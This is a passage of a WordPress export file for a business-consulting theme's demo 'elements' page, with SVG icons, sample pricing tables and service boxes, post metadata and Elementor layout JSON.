		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
			<h4>Progress Bars</h4>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h4>Pricing Tables</h4>		
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
			<h4>Flip Boxes</h4>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
			<h4>Service Boxes</h4>		
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="#">Explore More</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>624</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[elements__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[625]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8e54f4f","elType":"section","settings":{"padding":{"unit":"px","top":"85","right":"0","bottom":"90","left":"0","isLinked":false}},"elements":[{"id":"d69842b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"374421e","elType":"widget","settings":{"title":"Icon Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2ece61d","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b6775b1"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"21732ff"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"e1d2100"}],"icon_size":{"unit":"px","size":48,"sizes":[]},"align":"left","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"},{"id":"9df710a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1178550","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2ba221f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e256b55","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"aae9912","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":42,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9736423","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"740d57b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"42a0f44","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1ed1cd4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"af68c9c","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"9f24e04","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"db8197f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"6d55426","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6c42f1a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"ccfedc3","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"cd58237","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bc1f0b","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"b140664","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ab511b8","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve beven a strategy thought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"29f766a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ad7d79d","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy tmhought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"3bd1a3a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"5ff8069","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":36,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"icon_bg":"#52C5B61A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"0422c24","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4893536","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"6a60a09","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_size":{"unit":"px","size":43,"sizes":[]},"icon_color":"#FFFFFF","icon_bg":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9089712","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"ea9b75f","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"4c25bc2","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"596b78b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"698ffdc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"eb94e32","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"be4a619","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 